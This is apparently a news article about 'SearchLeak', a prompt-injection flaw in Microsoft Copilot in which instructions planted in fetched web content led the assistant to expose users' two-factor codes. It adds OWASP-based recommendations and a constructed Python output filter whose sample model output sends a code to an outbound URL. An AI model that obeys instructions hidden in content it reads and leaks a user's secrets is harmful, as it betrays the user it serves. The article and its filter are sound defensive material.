A critical security flaw in Microsoft Copilot has enabled malicious actors to extract two-factor authentication (2FA) codes directly from users' conversations with the AI assistant. The vulnerability, known as "SearchLeak," has been documented by Ars Technica and is described as a symptom of a persistent, structural failure in how the industry approaches security in large language models.
How the Attack Worked
The SearchLeak exploit centered on the way Copilot processes and relays external content during searches and tool execution. By planting specially crafted instructions in content that Copilot fetched from the web, an attacker could manipulate the assistant into exposing sensitive information from the user's active session — including one-time codes used for two-factor authentication, according to Ars Technica.
This is a variant of what is known as prompt injection via external content: the AI system fails to distinguish between legitimate instructions from the user and malicious instructions hidden in data it processes on the user's behalf.
SearchLeak shows that the industry keeps repeating the same security mistakes in LLM systems.

A Recurring Pattern
Ars Technica's coverage emphasizes that this is not an isolated incident, but part of a recognizable pattern: LLM-based products are shipped with insufficient security testing, and critical vulnerabilities are discovered after the fact — often by external researchers.
The security community has long warned that integrating web access, plugin systems, and agent-based tool chains dramatically expands the attack surface of AI assistants. When a model can send HTTP requests, read email, or launch other tools on a user's behalf, any failure in content filtering becomes potentially critical.
What the Research Community Recommends
According to established security principles for LLMs — including those from the OWASP LLM Top 10 framework — properly securing such systems requires far more than patching individual flaws after they are discovered.
Key recommendations include systematic red-team testing, in which specialized teams actively try to defeat a system's defenses before launch. Tools such as Microsoft's own PyRIT, as well as open-source solutions like Garak and LLM Guard, can be used to automate parts of this testing.
Additionally, experts recommend implementing Data Loss Prevention systems to catch sensitive information in model outputs, zero-trust architecture with multi-factor authentication and role-based access control, and isolation of LLM inference environments to prevent data leakage between different user contexts.
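As an added illustration, not code from Microsoft, Ars Technica or any of the tools named above, here is a minimal output-side DLP gate of the kind recommended here, applied to the injection-via-fetched-content scenario described earlier: it collects one-time codes the user has pasted into the session and refuses to relay any model output that would echo them, flagging in particular the case where a code has been placed into an outbound URL. The sample conversation, the proposed output, the `exfil.example` domain and all function names are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample conversation for this example (not from the real incident).
SESSION_CONVERSATION = [
    "user: my bank just texted me the login code 482913, what is it for?",
    "assistant: That is a one-time code used for two-factor authentication.",
]

# Typical one-time-code shape: 6 to 8 digits not embedded in a longer number.
OTP_RE = re.compile(r"(?<!\d)\d{6,8}(?!\d)")


def session_secrets(conversation: list[str]) -> set[str]:
    """Collect OTP-looking tokens the user has already shared in this session."""
    return {
        m.group()
        for line in conversation
        if line.startswith("user:")
        for m in OTP_RE.finditer(line)
    }


@dataclass
class DlpVerdict:
    allowed: bool
    redacted_output: str
    reasons: list[str]


def scan_output(output: str, secrets: set[str]) -> DlpVerdict:
    """Output-side DLP gate: refuse to relay a session OTP, and flag the case
    where it sits inside an outbound URL (the shape an injection carried by
    fetched web content would produce)."""
    reasons: list[str] = []
    redacted = output
    for secret in secrets:
        if secret in redacted:
            reasons.append("session OTP echoed in model output")
            redacted = redacted.replace(secret, "[REDACTED-OTP]")
    if re.search(r"https?://\S*\[REDACTED-OTP\]", redacted):
        reasons.append("OTP placed in an outbound URL (exfiltration pattern)")
    return DlpVerdict(allowed=not reasons, redacted_output=redacted, reasons=reasons)


if __name__ == "__main__":
    secrets = session_secrets(SESSION_CONVERSATION)
    # Constructed model output shaped by injected instructions; exfil.example is a placeholder.
    proposed = "Oslo: 12C, light rain. Opening https://exfil.example/?c=482913"
    print(scan_output(proposed, secrets))
```

In a real deployment the gate sits between the model and every tool dispatcher (HTTP fetch, email, plugins), so a blocked verdict stops the side effect rather than only the displayed text.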
Supply Chain and Agent-Based Risks
One dimension that is frequently underestimated is the risk associated with the supply chain of LLM systems. OWASP identifies this as LLM05 in its Top 10 list. Compromised third-party components — from pre-trained models to fine-tuning adapters and datasets — can introduce backdoors that are extremely difficult to detect.
For agent-based systems like Copilot, where the AI operates with its own tools and can take autonomous actions, the attack vectors are further expanded. The OWASP ASI 2026 framework specifically highlights goal hijacking and tool misuse as the foremost threats to autonomous AI agents.
The SearchLeak vulnerability is a clear example of how the ambition level in AI product development is currently outpacing security work — and that the consequences for end users can be very real.
